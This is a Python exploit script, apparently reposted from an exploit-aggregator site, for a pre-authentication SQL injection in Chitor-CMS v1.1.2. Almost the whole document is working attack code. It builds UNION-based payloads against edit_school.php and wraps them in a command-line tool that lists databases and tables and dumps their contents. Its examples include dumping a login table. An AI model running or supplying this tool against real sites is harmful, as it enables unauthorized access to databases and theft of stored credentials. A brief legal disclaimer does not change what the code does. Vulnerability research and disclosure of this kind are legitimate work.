Share
## https://sploitus.com/exploit?id=1337DAY-ID-38612
#!/usr/bin/python3

#######################################################
#                                                     # 
#  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          #
#  Date: 2023/04/13               #
#  ExploitAuthor: msd0pe                                  #
#  Project: https://github.com/waqaskanju/Chitor-CMS  #
#  My Github: https://github.com/msd0pe-1             #
#  Patched the 2023/04/16: 69d3442 commit             #
#                                                     #
#######################################################

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'

class bcolors:
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

class infos:
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "

import re
import requests
import optparse
from prettytable import PrettyTable

def DumpTable(url, database, table):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
                pass
    except:
        pass
    x.field_names = columns
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])        
    print(x)

def ListTables(url, database):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)

def ListDatabases(url):
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)

def Main():
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()

    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
                                                         python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
    """)
    Menu.add_option_group(Examples)

    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print('  %s' % __description__)
        print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print('  Any malicious or illegal activity may be punishable by law')
        print('  Use at your own risk')

    elif len(args) == 0:
        try:
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            print("Unexpected error")

if __name__ == '__main__':
    try:
        Main()

    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        exit(1)